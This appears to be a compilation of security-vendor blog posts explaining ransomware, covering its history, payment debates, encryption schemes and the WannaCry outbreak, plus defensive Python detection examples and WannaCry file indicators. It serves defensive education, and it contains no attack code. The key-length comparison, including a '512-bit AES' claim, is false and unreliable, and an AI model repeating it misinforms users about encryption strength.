The Complete Guide to Ransomware

Ransomware – malware that encrypts a victim’s data and extorts a ransom, to be paid within a short time frame or the victim risks losing all of his files – has been around for quite some time. In 1989 the first known ransomware, dubbed the AIDS Trojan, infected 20,000 floppy diskettes – remember those? The diskettes supposedly contained information on the AIDS virus and were handed out at a conference. Upon loading the DOS-based software from the disk, the program counted the number of times the computer was rebooted. Once it reached 90, it hid the directories, encrypted the names of the files and demanded $189.00 to decrypt them.

Ransomware has since evolved from its early sneaker-net roots, leveraging the Internet and email to spread between computers. However, it still follows a predictable script, not all that different from the original AIDS Trojan: the malware enters the network via a phishing attack, files get encrypted, and the user sees a notification with instructions on how to submit bitcoins in order to decrypt the files.

Unfortunately, ransomware attackers have seen how lucrative ransom payments can be. With each attack worth hundreds to thousands of dollars or more, they’ve become even more ambitious with the amount they’re demanding, and how they’re demanding it.

How’s this for ambition: some attackers, even after you’ve paid them the ransom, only partially unlock the files in an effort to demand even more from vulnerable businesses. In one case, a hacker even demanded a ransom as high as one million dollars.

They’re also pushing the boundaries to see how quickly they’re able to extort from unprepared individuals and organizations. Recently, we were introduced to a different attack vector with WannaCry. Instead of a phishing attack, attackers used the NSA’s ETERNALBLUE exploit, allowing it to spread peer-to-peer within an organization, impacting vulnerable Windows machines – laptops, desktops, tablets, and servers.

The result? WannaCry was the fastest and largest ransomware attack we’ve seen so far. However, some security experts are already debating whether the latest NotPetya attack is even deadlier than WannaCry.

By experimenting with how an attack is released, how much to extort, and the intensity and velocity with which they spread harm, hackers advance their knowledge base, changing how they develop new strains as well as their attack vectors.

What hasn’t changed is that it is still possible to detect and prevent a zero-day ransomware attack – that’s according to a Northeastern University ransomware research paper. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, the research team analyzed 1,359 ransomware samples from between 2006 and 2014, and found that a “close examination on the file system activities of multiple ransomware samples suggests that by… protecting Master File Table (MFT) in the NTFS file system, it is possible to detect and prevent a significant number of zero-day ransomware attacks.”[1]

In this guide, we’ll help you better understand the role that bitcoin plays in ransomware, various types of ransomware, attack vectors, and cover a few mitigation methods.

What Bitcoin Has to Do With Ransomware

Bitcoin is often associated with ransomware because attackers typically request payments to be submitted in that form of currency. But what exactly is bitcoin?

Bitcoin is digital currency that lets you anonymously buy goods and services. You can send bitcoins digitally using a mobile phone app or computer. It’s as easy as swiping a credit card.

Bitcoins are stored in a digital wallet, which resides in the cloud or on a user’s computer. It’s similar to a bank account, but it isn’t insured by the FDIC. Also, bitcoins aren’t tied to any country or subject to regulation, and there are no credit card fees.

Each bitcoin transaction is recorded on a public log. The names of buyers and sellers are anonymous – only their wallet IDs are revealed – which lets buyers and sellers do business without it being easily traced back to them. As a result, bitcoin has become a popular form of payment for cybercriminals. To evade identification, many bitcoin addresses used by cybercriminals have no more than 6 transactions.[2]

To make a bitcoin payment, victims are often instructed to download anonymous browsers, such as Tor2web or Torproject, in order to visit a URL hosted on anonymous servers. Tor (The Onion Router) makes it difficult to trace the location of the server or the identity of its operators.

Should You Pay?

The short answer is: it depends.

But Some Say, Yes

At a Cybersecurity Summit, Joseph Bonavolonta, the Assistant Special Agent in charge of the FBI’s CYBER and Counterintelligence Program, said, “To be honest, we often advise people just to pay the ransom.”

He explained, “The success of the ransomware ends up benefitting victims: because so many people pay, the malware authors are less inclined to wring excess profit out of any single victim, keeping ransoms low. And most ransomware scammers are good to their word. You do get your access back.”

If you do pay, the FBI stated that most ransomware payments are typically between $200 and $10,000.[3]

But there have been instances where the payment has been much higher. In 2014, the City of Detroit’s files were encrypted and the attackers demanded a ransom of 2,000 bitcoins, worth about $800,000.[4] Luckily, the ransom was not paid because the database wasn’t used or needed.

There might be times when you’re faced with other considerations. The Tennessee Dickson County Sheriff’s Office paid $622.00 in bitcoin to hackers who encrypted the department’s criminal case files, making them inaccessible to investigators.[5] Detective Jeff McCliss said, “It really came down to a choice between losing all of that data – and being unable to provide the vital services that that data would’ve assisted us in providing the community versus spending 600-and-some-odd dollars to retrieve the data.” The department was lucky; it got back access to its files.[6]

Thou Shall Not Pay

Some security experts disagree with Mr. Bonavolonta’s remarks and urge you not to pay the ransom, because there’s no guarantee that your files will be returned to their original state even after you pay. Moreover, paying perpetuates an ongoing problem, making you a target for more malware.

In 2016 it was reported that a Kansas hospital hit with ransomware paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest. As a result, the hospital refused to pay a second ransom because it was no longer “a wise maneuver or strategy.”

Worse, if you get infected with a defective strain such as Power Worm, you won’t get your files back regardless of what you do. Even if you intend to pay the ransom, this strain inevitably destroys the victim’s data during the encryption process.

Alternatively, if you encounter an attack like NotPetya where the intention wasn’t about financial gain, but destroying data, even if you stockpile bitcoins to pay the ransom, you won’t get your data back.

The Department of Homeland Security has also advised victims not to negotiate with hackers. Conflicting advice has prompted a debate about whether the FBI is encouraging behavior that will lead to more hacking.

In a Wall Street Journal interview, FBI spokeswoman Kristen Setera declined to say if FBI officials recommend paying a ransom to hackers, as Mr. Bonavolonta stated.[7]

Why You Should Work With Law Enforcement

John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division, acknowledged in a recent podcast that there remains confusion at the FBI on whether or not you should pay.

He confirmed that the FBI officially does not encourage paying a ransom. However, similar to a kidnapping case, that doesn’t mean that if you go to law enforcement they’re going to recommend you not pay.

But one thing is for certain. If you do go to law enforcement, they will be able to provide a few insights that you wouldn’t otherwise have.

First, law enforcement can provide you with valuable information. Carlin advised, “If it’s a group they’ve been monitoring, they can tell you…whether they’ve seen that group attack other actors before, and if they have, whether if you pay they’re likely to go away or not. Because some groups just take your money and continue.”

Secondly, he identified a major benefit to working with law enforcement – you’ll be hedging against the risk of inadvertently paying off a terrorist when you pay the ransom. He advised, “You can end up violating certain laws when it comes to the Office of Foreign Assets Control by paying a terrorist or another group that’s designated as a bad actor. But more importantly, you do not want to be in a situation where it becomes clear later that you paid off a terrorist.”

But Before You Pay, Find Out If There’s A Decryption Tool

Finally, if you are faced with managing a ransomware attack, go online to see if a decryption tool exists. If you’re able to find the keys, there’s no need to pay. Sometimes, when the police and security experts investigate cybercriminal activity, they can obtain decryption keys from malicious servers and share them online, as happened for CoinVault, TeslaCrypt, and the popular CryptoLocker.

Keep in mind that, whether or not you pay the ransom, the cumulative cost of a ransomware attack is typically greater than the ransom itself. The cost to the brand, lost productivity, legal fees, etc., all accrue once the attack is triggered.

Perhaps another way that might help you decide is to understand the type of ransomware you’re dealing with.

Major Ransomware Types

Let’s get started. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, researchers identified three major types: encryption, deletion, and locking.


Encryption

CryptoLocker and CryptoWall have a reputation for being strong encryption ransomware. Encryption is the process of applying an algorithm (also known as a cipher) to data so that it is unintelligible to anyone without the key. And to decrypt the data, you’ll need keys. There are two types: symmetric and public.

Symmetric Keys

Advanced Encryption Standard (AES), Rivest Cipher 4 (RC4), and Data Encryption Standard (DES) are examples of symmetric-key algorithms. With symmetric encryption, the same key is used for both encryption and decryption. It’s only effective when the symmetric key is kept secret by the two parties involved.


Public Keys (Asymmetrical Key)

Rivest, Shamir, & Adleman use two different keys in their famous RSA algorithm: a public key that everyone has access to, and a private key that is controlled by the person with whom you wish to communicate.


Strength of an Encryption

To understand the strength of the encryption, you have to look at both the type of encryption being used – whether symmetric or public/asymmetric – and the key length.

Two important facts: key length is measured in bits, and the longer the key, the stronger the encryption.

Breaking an Encryption

For a symmetric algorithm, you’ll need a couple of hours of computer time for something like a 20-bit key or years for a 128-bit key (2^128 = 340,282,366,920,938,463,463,374,607,431,768,211,456 possible 128-bit keys).

For a public key algorithm, a 32-bit key would only require 2^32 combinations to break. Even a 512-bit key can be easily broken (within a few months), but 2,048-bit is far harder.

Comparing public and symmetric keys can be confusing. Here’s a rough benchmark: a 350-bit RSA key is roughly considered the same strength as 40-bit RC4 and 512-bit AES.

The wonky reason for these differences in key-breaking speeds is that with RSA you have to factor a number—don’t ask!

Ransomware Encryptions

The first ransomware variants used a symmetric-key algorithm and eventually upgraded to public keys. Today, more advanced ransomware uses a combination of symmetric and public.

Most cybercriminals probably wouldn’t use a public key to encrypt a large file system because it is much slower than symmetric-key encryption. Taking too long to encrypt files could also allow the ransomware operation to be thwarted before the encryption process is complete.

So a better idea is to use symmetric techniques to quickly encode the file data, and asymmetric to encode the key. In CryptoLocker, for example, AES (symmetric) was used for file encryption, and RSA (public) for encrypting the AES key.

Another blend you might see in the near future is elliptic curve cryptography (ECC) and RSA. ECC is described as the next generation of public key cryptography, in which you can create faster, smaller, and more efficient cryptographic keys. Some researchers say that ECC can yield a level of security with a 164-bit key that other systems require a 1,024-bit key to achieve.[8]


Deletion

With deletion, attackers threaten and warn: any of your attempts to decrypt files would only result in an “irrevocable loss of your data.”[9] Or if you don’t pay, the files get deleted. Popular examples of deletion include Gpcode and FileCoder.

Typically when we delete something, we wipe it off the disk. But in analyzing all the samples, the researchers learned that lots of data remained on disk because attackers were lazy, often choosing the easiest path. However, they’re also very clever. The researchers found that while the NTFS Master File Table indicated that files were deleted, the files were actually still on disk, so recovery is potentially possible. However, depending on the strain and how ransomware evolves, there’s also the potential that your data might be destroyed.


Locking

With locking, attackers create a new login screen or HTML page that makes it appear as though a law enforcement agency has taken over the computer. They display a warning pertaining to laws such as those on copyrighted materials or child pornography. Or they might disable other components, typically keyboard shortcuts. Examples include Winlock and Urausy.

Attack Vectors

You can bet that new types of ransomware are constantly being developed, including attack vectors that aren’t like the usual garden variety, such as malvertising, ransomworm, and peer-to-peer file transfer programs.

As I was once reminded by a security pro, attacks don’t need to be complicated. It can be something as simple as a link in an email or an email attachment, and that’s what most ransomware strains rely on to get into your network. Therefore curious individuals who can’t resist clicking on links or opening attachments would benefit from security awareness training.

Let’s not forget the devastating effects of WannaCry and NotPetya, so make sure your software is up-to-date so that your security updates are also up-to-date!

We’re also seeing more instances of Ransomware-as-a-Service, where hackers sell their malware to other cybercriminals, increasing the frequency and reach of ransomware. Ransomware authors can enlist anyone to sign up and everyone would earn a percentage of the profits. To combat this problem, organizations might benefit from a few mitigation strategies, which we’ll cover later.

What to Do After You’ve Been Infected

Most people don’t realize they’ve been infected until their screen displays a ransom note notifying them that their files have been encrypted. If you discover that your computer has been infected, shut it down or disconnect it from the network.

If you’ve decided against paying the ransom, scan your computer with an anti-virus or anti-malware program and let it remove everything. You can potentially use PowerShell or other tools to identify encrypted files, but with a new ransomware variant popping up every week, there isn’t a one-size-fits-all identification and decryption tool. What most experts recommend is to restore from a backup.

One caveat is that backups aren’t 100% fail safe. Some ransomware strains will either encrypt your backups or worse, hide in your backups so that after you restore files they will attack again.

However, if you decide to pay the ransom, you have our sympathy! We empathize and understand what a pain it must have been and hope that once you pay, all your files get decrypted. Don’t forget to scan your computer with an anti-virus or anti-malware program and let it remove everything. Also review the mitigation methods below!

Mitigation Methods

Monitor File System Activity

After looking at 1,359 ransomware samples, the Northeastern University researchers learned that it is possible to stop a large number of ransomware attacks, even those using deletion and encryption capabilities.

Significant changes occur in the file system (e.g., a large number of deletions in the log) when the system is under attack. By closely monitoring file system logs and configuring your monitoring solution to alert when this behavior is observed, you can detect the mass creation, encryption, or deletion of files.

User Behavior Analytics or Signature-Based?

Some IT pros have turned to endpoint security solutions in the hope that it will detect and stop crypto-malware. However, the industry is catching on to the fact that, as one observer put it, “signature-based antivirus software that most organizations still rely on to defend them can’t cope with modern attacks.”

A recent CIO article described the drawback best:

 “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime the malefactors can create new malware that signature-based defenses can’t defend against.”

Bottom line: endpoint security solutions can’t block unknown ransomware variants by, for example, blacklisting connections to a current (but outdated) list of C&C servers. They’re also bound to a device/user/process, and so don’t provide any anti-heuristics or debugging techniques.

Instead, User Behavior Analytics (UBA) has become an essential go-to ransomware prevention measure, and it has been shown to detect zero-day ransomware attacks as well.

Defending the inside from legitimate users is just not part of the equation for perimeter-based security, and hackers are easily able to go around the perimeter and get inside. They enter through legitimate public ports (email, web, login) and then gain access as users.

Once in, cybercriminals have become clever at implementing a ransomware attack that isn’t spotted by anti-virus software.

In fact, to an IT admin who is just monitoring their system activity, the attackers appear as just another user.

And that’s why you need UBA!

UBA really excels at handling the unknown. In the background, the UBA engine can baseline each user’s normal activity, and then spot variances and report them in real time – in whatever form they reveal themselves. For instance, an IT admin can configure a rule to, say, spot thousands of “file modify” actions in a short time window.

UBA takes a cross-system approach, too: it can notice abnormal file behavior combined with weird email actions combined with weird login behavior (from AD). Think of UBA as File System Monitoring 2.0 – and keep in mind that the best UBA benefits from having the most context.
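The burst heuristic described in the file system monitoring and UBA sections above (a large number of modify, rename or delete events from one account in a short window, judged against that user’s own baseline) can be implemented as a sliding-window detector. The following Python is an added example, not code from Varonis, DatAlert or the Northeastern paper; the event format, the 60-second window, the floor of 20 events and the 5× baseline multiplier are assumptions chosen for illustration, and all events are constructed sample data rather than real audit logs.

```python
"""Sliding-window detection of ransomware-like bursts of file activity.

Added example (not from the original post). Event format, window size and
thresholds are assumptions; HISTORY and TODAY are constructed sample data.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Actions that ransomware generates in bulk; reads are ignored.
DESTRUCTIVE = {"modify", "rename", "delete"}


@dataclass(frozen=True)
class FileEvent:
    ts: datetime
    user: str
    action: str   # read / modify / rename / delete
    path: str


def _window_counts(events, window):
    """Yield (event, count, window_start) for each destructive event, where
    count is that user's destructive events in the trailing window."""
    queues = defaultdict(deque)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.action not in DESTRUCTIVE:
            continue
        q = queues[ev.user]
        q.append(ev.ts)
        while ev.ts - q[0] > window:      # drop timestamps older than the window
            q.popleft()
        yield ev, len(q), q[0]


def baseline_rate(history, window=timedelta(seconds=60)):
    """Per-user peak destructive events per window observed in normal history."""
    peak = defaultdict(int)
    for ev, count, _ in _window_counts(history, window):
        peak[ev.user] = max(peak[ev.user], count)
    return dict(peak)


def detect_bursts(events, baseline, window=timedelta(seconds=60), floor=20, multiplier=5):
    """Return one alert (user, window_start, window_end, count) per user whose
    destructive-event count in any window reaches both an absolute floor and
    multiplier x that user's baseline. Users without history get baseline 0."""
    alerts, fired = [], set()
    for ev, count, start in _window_counts(events, window):
        threshold = max(floor, multiplier * baseline.get(ev.user, 0))
        if count >= threshold and ev.user not in fired:
            fired.add(ev.user)
            alerts.append((ev.user, start, ev.ts, count))
    return alerts


def constructed_events(user, action, start, count, step_seconds, share):
    """Build a regular series of constructed events (sample data, not a real log)."""
    return [
        FileEvent(start + timedelta(seconds=i * step_seconds), user, action,
                  f"{share}\\doc{i:03d}.docx")
        for i in range(count)
    ]


# Yesterday (normal): alice saves a document every two minutes; bob rarely writes.
HISTORY = (
    constructed_events("alice", "modify", datetime(2017, 5, 11, 9, 0), 30, 120, r"\\fs01\finance")
    + constructed_events("bob", "modify", datetime(2017, 5, 11, 9, 0), 5, 600, r"\\fs01\hr")
)

# Today: alice works as usual; bob's account renames 40 files in 20 seconds.
TODAY = (
    constructed_events("alice", "modify", datetime(2017, 5, 12, 9, 0), 12, 60, r"\\fs01\finance")
    + constructed_events("alice", "read", datetime(2017, 5, 12, 9, 0), 12, 60, r"\\fs01\finance")
    + constructed_events("bob", "rename", datetime(2017, 5, 12, 9, 30), 40, 0.5, r"\\fs01\hr")
)


def main():
    base = baseline_rate(HISTORY)
    for user, start, end, count in detect_bursts(TODAY, base):
        print(f"ALERT {user}: {count} destructive events between {start.time()} "
              f"and {end.time()} (baseline {base.get(user, 0)} per window)")


if __name__ == "__main__":
    main()
```

Alice’s steady editing never approaches the threshold, while bob’s account trips the alert on its 20th rename, less than ten seconds into the burst; the per-user baseline is what keeps a genuinely busy user from being mistaken for the worm, and a real deployment would feed the same queue from native auditing or a monitoring platform instead of constructed events.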

Create Honeypots

Cybercriminals may avoid encrypting all files and start by encrypting recently accessed files. Create a decoy by planting fake files and folders, and monitor them regularly.

This is also a good method for organizations that don’t have an automated solution to monitor file access activity. That also means you might be forced to enable native file system auditing, which unfortunately taxes your monitored systems. Instead, prioritize sensitive areas and set up a file share honeypot.

A file share honeypot is an accessible file share that contains files that look normal or valuable, but in reality are fake. As no legitimate user activity should be associated with a honeypot file share, any activity observed should be scrutinized carefully. If you’re stuck with manual methods, you’ll need to enable native auditing to record access activity, and create a script to alert you when events are written to the security event log (e.g. using dumpel.exe).
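Since no legitimate activity should ever touch a honeypot share, the simplest check is a baseline-and-compare over the decoy contents. The Python below is an added example, not Varonis code or a replacement for the native-auditing approach the post describes (hashes tell you that a decoy changed, not which account did it); the decoy names, the temporary share location and the tampering simulated in demo() are all constructed for illustration.

```python
"""Integrity check for a file share honeypot.

Added example (not from the original post). Decoy names, share location and
the tampering in demo() are constructed; the check is a plain baseline-and-
compare over SHA-256 digests of the decoy files.
"""
import hashlib
import tempfile
from pathlib import Path

# Constructed decoy names: plausible-looking, but nothing legitimate ever touches them.
DECOY_NAMES = ("Q3_Payroll_FINAL.xlsx", "Merger_Term_Sheet.docx", "Board_Minutes_2017.pdf")


def create_decoys(share_dir: Path, names=DECOY_NAMES) -> None:
    """Plant decoy files with filler content in the honeypot share."""
    share_dir.mkdir(parents=True, exist_ok=True)
    for name in names:
        (share_dir / name).write_bytes(f"DECOY {name}\n".encode() * 64)


def snapshot(share_dir: Path) -> dict:
    """Record name -> SHA-256 of every file in the share (the known-good baseline)."""
    return {p.name: hashlib.sha256(p.read_bytes()).hexdigest()
            for p in share_dir.iterdir() if p.is_file()}


def check_decoys(share_dir: Path, baseline: dict) -> list:
    """Compare the share with its baseline. Every difference is an alert:
    a decoy rewritten in place (encryption), a decoy gone (deletion or
    rename), or a file that was never planted (e.g. a ransom note)."""
    current = snapshot(share_dir)
    alerts = []
    for name, digest in baseline.items():
        if name not in current:
            alerts.append(("deleted", name))
        elif current[name] != digest:
            alerts.append(("modified", name))
    alerts.extend(("unexpected", name) for name in current if name not in baseline)
    return sorted(alerts)


def demo() -> list:
    """Plant decoys, take a baseline, simulate tampering (constructed, not a
    live infection) and return what the check reports."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp) / "honeypot_share"
        create_decoys(share)
        base = snapshot(share)
        assert check_decoys(share, base) == []               # untouched share is quiet
        (share / DECOY_NAMES[0]).write_bytes(b"\x00" * 32)   # overwritten in place
        (share / DECOY_NAMES[1]).unlink()                    # removed
        (share / "READ_ME_TO_RESTORE.txt").write_text("constructed note\n")
        return check_decoys(share, base)


if __name__ == "__main__":
    for kind, name in demo():
        print(f"ALERT honeypot {kind}: {name}")
```

In practice the snapshot is taken once after planting and the check runs on a short schedule against the live share; pairing it with native auditing on the same folder adds the account name to the alert, which is what you need to disable the account or isolate the host.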

Least Privilege Model

Another approach is to control access to data and work towards achieving a least privilege model. Your goal is to reduce exposure quickly by removing unnecessary global access groups from access control lists. Groups such as “Everyone,” “Authenticated Users,” and “Domain Users,” when used on data containers (like folders and SharePoint sites), can expose entire hierarchies to all users in a company. In addition to being easy targets for theft or misuse, these exposed data sets are very likely to be damaged in a malware attack. On file servers, these folders are known as “open shares”—where both file system and sharing permissions are accessible via a global access group.

Additional Resources

[1] http://seclab.ccs.neu.edu/static/publications/dimva2015ransomware.pdf

[2] http://seclab.ccs.neu.edu/static/publications/dimva2015ransomware.pdf

[3] https://www.ic3.gov/media/2015/150623.aspx

[4] http://www.detroitnews.com/story/news/politics/michigan/2014/11/17/north-american-international-cyber-summit/19162001/

[5] http://www.nbcnews.com/nightly-news/security-experts-you-should-never-payransomware-hackers-n299511

[6] http://www.nbcnews.com/nightly-news/security-experts-you-should-never-pay-ransomware-hackers-n299511

[7] https://www.wsj.com/articles/paying-ransoms-to-hackers-stirs-debate-1447106376

[8] http://searchsecurity.techtarget.com/definition/elliptical-curve-cryptography

[9] http://www.anti-spyware-101.com/remove-filecoder-ransomware

Why did last Friday’s ransomware infection spread globally so fast?

Quick ransomware background

Ransomware is a type of malware that encrypts your data and asks for you to pay a ransom to restore access to your files. Cyber criminals usually request that the ransom be paid in Bitcoins: the #1 cryptocurrency (basically a distributed ledger) which can be used to buy and sell goods. By nature, Bitcoin transactions (e.g. ransom payments) are very difficult to trace.

Historically, most ransomware infections use the attack vector – how they get in – of social engineering (like clickbait from a social media platform – think cute kitty pics on Facebook or Twitter) or email phishing campaigns, which contain attachments or links to a website. The end result is that a malicious payload gets a foothold on a machine inside a corporate network. Unfortunately, all of those next generation perimeter defenses that organizations spend good money on are not that difficult to bypass in order to get inside.

Once inside, most ransomware will scan the internal network to see which servers host file shares, attempt to connect to each share, encrypt its contents, and then demand that a ransom be paid to regain access to the now-encrypted files. End users can usually access far more data than they should be able to, either through wide-open permissions or by accumulating permissions over the course of their employment. Think for a minute just how often you’ve stumbled across a folder or files that you know you shouldn’t be able to access. Access controls are out of control, and IT is typically blind to it because of the sheer complexity of file system permissions.

Good to know, but what was different last week?

Without going too much into the technical details, I can tell you that the code behind the biggest ransomware outbreak in history isn’t actually all that special. It’s a type of cryptoworm: a self-propagating form of malware. That means that once it gets a foothold, it can spread autonomously without the need for someone to remote control it.

Normally, ransomware targets unstructured data hosted on file shares – this ransomware, however, did not discriminate.

In April, several hacking tools created by the NSA were leaked online. These hacking tools exploit vulnerabilities in hardware and software so that they can hack into or move laterally around a computer network.

WannaCry ransomware (also known as WCry / WanaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r) – the type responsible for last Friday’s attack – went a few steps further: once it got onto even a single machine within a corporate network, it did the following:

  • Looped through any open RDP (Remote Desktop) sessions, to encrypt data on the remote machine
  • Sought out any vulnerable* Windows machines – endpoints (laptops/desktops/tablets) and servers using Microsoft vulnerabilities
  • Used the traditional approach of going after file shares directly from the endpoint

*The particular vulnerability that made the difference last week was in the Microsoft SMBv1 file sharing protocol, which was used to hop from machine to machine encrypting data – like a spider web effect. Most internal servers are separated on internal networks so that end users can’t access them. The cryptoworm would need to hit just one internal server (e.g. a file server) and from there it would target whatever vulnerable servers that file server can access. This allowed it to quickly traverse entire networks, effectively crippling many of them. Like many cryptoworms, it’s self-propagating and so replicates itself and searches out to other vulnerable hosts/computer networks worldwide.

The truth is that the worldwide infection could have been much worse if not for the quick thinking of a security researcher. @MalwareTechBlog spotted that the malware code was connecting out to a nonsensical domain, which was not registered. This callout was hard-coded, possibly so the creator could stop it and likely also to help avoid IDS/IPS sandboxing techniques. If the request comes back showing that the domain is live, the “kill switch” kicks in to stop the malicious part of the code from executing – effectively stopping the malware in its tracks. @MalwareTechBlog, acting on a hunch, registered the domain name and immediately saw thousands of connections every second. The result was that he stopped what could have been a much wider infection.

The bad news is that new versions of the code are already in development: https://www.bleepingcomputer.com/news/security/with-the-success-of-wannacry-imitations-are-quickly-in-development/

Lessons Learned

Microsoft released a patch (software code update to fix vulnerabilities) for this particular SMBv1 vulnerability back in March. The sad truth of the matter is that proper vulnerability patch management processes would mean that most organizations would not have been so badly affected.

That’s not to say that vulnerability patch management processes are enough coverage for ransomware. Nor are backups, since some ransomware will hide in your backups so that after you restore files they will simply attack again.

There is no one stop shop for stopping ransomware infections or any cyber security threat for that matter. Security is all about risk reduction – and requires a layered approach with controls in place at each layer while leveraging solutions to automate processes wherever possible. If any organization says that they’re 100% safe from cyber-attacks, then they’re either delusional or telling you porky pies!

🚨 Massive Ransomware Outbreak: What You Need To Know

Remember those NSA exploits that got leaked a few months back? A new variant of ransomware using those exploits is spreading quickly across the world – affecting everyone from the NHS to telecom companies to FedEx.

Here’s What We Know So Far

Ransomware appears to be getting in via social engineering and phishing attacks, though vulnerable systems may also be at risk if TCP port 445 is accessible. Unlike most ransomware, which encrypts any accessible file from a single infected node, this ransomware also moves laterally via exploit (i.e., EternalBlue) to vulnerable unpatched workstations and servers, and then continues the attack. Unpatched Windows hosts (Vista, 7, 8, 10, Server 2008, 2008 R2, 2012, 2012 R2, and 2016) running SMBv1 are all vulnerable.

Infected hosts are running strains of ransomware, such as Wanna Decrypt0r (more below), that encrypt files and change their extensions to:

  • .WRNY
  • .WCRY (+ .WCRYT for temp files)
  • .WNCRY (+ .WNCRYT for temp files)

The ransomware also leaves a note in files named @Please_Read_Me@.txt or !Please_Read_Me!.txt, and displays an onscreen warning.
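The extensions and note names listed above are exactly the kind of dictionary a signature-based rule consumes, and they are also what an incident responder uses to build the list of files to restore from backup. The Python below is an added example, not Varonis or DatAlert code: it applies those indicators to a constructed directory listing, recovering the original file name from each encrypted file and separating temp files and ransom notes from everything else. The listing and the function names are mine; the indicator strings come from this post.

```python
"""Triage a directory listing against a dictionary of WannaCry indicators.

Added example (not Varonis code). The extensions and note names come from
the post; SAMPLE_LISTING is constructed and the function names are mine.
"""
from pathlib import PureWindowsPath

# Indicators from the post: final extensions, temp-file extensions, note names.
ENCRYPTED_EXTENSIONS = {".wrny", ".wcry", ".wncry"}
TEMP_EXTENSIONS = {".wcryt", ".wncryt"}
RANSOM_NOTES = {"@please_read_me@.txt", "!please_read_me!.txt"}


def classify(path: str):
    """Return ("encrypted", original_name), ("temp", original_name),
    ("note", file_name) or None when nothing matches. Matching is on the
    exact trailing extension, case-insensitively, so a benign file whose
    name merely contains 'wncry' is not flagged."""
    name = PureWindowsPath(path).name
    lower = name.lower()
    if lower in RANSOM_NOTES:
        return ("note", name)
    for ext in ENCRYPTED_EXTENSIONS | TEMP_EXTENSIONS:
        if lower.endswith(ext):
            kind = "temp" if ext in TEMP_EXTENSIONS else "encrypted"
            return (kind, name[:-len(ext)])      # strip the appended extension
    return None


def triage(paths):
    """Group a listing into encrypted files (original name -> encrypted path,
    i.e. the list to restore from backup), temp files, notes and clean files."""
    report = {"encrypted": {}, "temp": [], "notes": [], "clean": []}
    for p in paths:
        hit = classify(p)
        if hit is None:
            report["clean"].append(p)
        elif hit[0] == "encrypted":
            report["encrypted"][hit[1]] = p
        elif hit[0] == "temp":
            report["temp"].append(p)
        else:
            report["notes"].append(p)
    return report


# Constructed listing (not a real capture); the last entry is a benign near-miss.
SAMPLE_LISTING = [
    r"\\fs01\finance\budget_2017.xlsx.WNCRY",
    r"\\fs01\finance\budget_2017.xlsx.WNCRYT",
    r"\\fs01\finance\@Please_Read_Me@.txt",
    r"\\fs01\finance\forecast.docx",
    r"\\fs01\hr\salaries.csv.wcry",
    r"\\fs01\hr\!Please_Read_Me!.txt",
    r"\\fs01\hr\wncry_notes.txt",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LISTING)
    print("restore from backup:", sorted(result["encrypted"]))
    print("ransom notes:", result["notes"])
    print("unmatched (clean, or an unknown variant):", result["clean"])
```

The "clean" bucket is the honest limit of this approach: a variant that appends an extension not yet in the dictionary lands there until someone updates the list, which is why the post pairs dictionary updates with the behavioral threat model.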

Here’s What You Can Do

MS17-010, released in March, closes a number of holes in Windows SMB Server. These exploits were all exposed in the recent NSA hacking tools leak. Exploit tools such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance (all part of the Fuzzbunch exploit platform) all drop DoublePulsar onto compromised hosts. DoublePulsar was created by the NSA and is basically a malware downloader, which is used as an intermediary for downloading more potent malware executables onto infected hosts.

If you’re an existing DatAlert customer, you can set up office hours with your assigned engineer to review your threat models and alerts. Don’t have DatAlert yet? Get a demo of our data security platform and see how to detect zero-day attacks.

DatAlert Customers

If you’re a DatAlert Analytics customer, the threat model “Immediate Pattern Detected: user actions resemble ransomware” was designed to detect this and other zero-day variants of ransomware; however, we also strongly recommend that you update the dictionaries used by DatAlert signature-based rules. Instructions for updating your dictionaries are here: https://connect.varonis.com/docs/DOC-2749

If for some reason you can’t access the connect community, here is how to update your dictionaries to include the new extensions for this variant:

Open the DatAdvantage UI > Tools > Dictionaries > Crypto files (Predefined)

Open the DatAdvantage UI > Tools > Dictionaries > Encrypted files (Predefined)



The malware exploits multiple Windows SMBv1 remote code execution vulnerabilities:

Windows Vista, 7, 8, 10, Server 2008, 2008 R2, 2012, 2012 R2 and 2016 are all vulnerable if not patched and the SMBv1 Windows feature is enabled.


Ransomware strains

WCry / WannaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r

This outbreak is version 2.0 of the WCry ransomware, which first appeared in March. Until this outbreak, this ransomware family was barely heard of. Though it likely spread via phishing and social engineering attacks, if TCP port 445 is exposed on vulnerable Windows machines, that could be exploited using the Fuzzbunch exploit platform.

Planet Ransomware

If you were expecting a quiet Friday in terms of cyberattacks, this ain’t it. There are reports of a massive ransomware attack affecting computers on a global scale: in the UK, Spain, Russia, Ukraine, Japan, and Taiwan.

The ransomware variant that’s doing the damage is called WCry, also known as WannaCry or WanaCrypt0r. It has so far claimed some high-profile targets, including NHS hospitals in the UK, and telecom and banking companies in Spain.

Be calm and carry on, of course.

On the blog, we’ve been writing about ransomware over the last two years, and we have great educational resources to help you prevent or reduce the damage of an attack.

Here’s a quick overview of our content.

What is it?

Our ransomware guide: https://blog.varonis.com/the-complete-ransomware-guide/ 

Learning more

The Troy Hunt course: https://blog.varonis.com/introduction-to-ransomware-course/

How it spreads

Yes, it can have worm-like features: https://blog.varonis.com/next-gen-ransomware-ransomworm-gets-deadlier/

Can I make my own (for research purposes)?

Yes, but only under adult supervision:



Reducing the risk

Limiting file access really, really helps: https://blog.varonis.com/the-best-ransomware-defense-dont-have-files/

Legal and Regulatory Implications

For US companies, this is what you need to know: https://blog.varonis.com/ransomware-the-legal-cheat-sheet-for-breach-notification/

Should you pay?

It depends:



Is a decryption solution available?

Check here: https://www.varonis.com/ransomware-identifier/

The ultimate answer to ransomware

User Behavior Analytics (UBA): https://blog.varonis.com/why-uba-will-catch-the-zero-day-ransomware-attacks-that-endpoint-protection-cant/

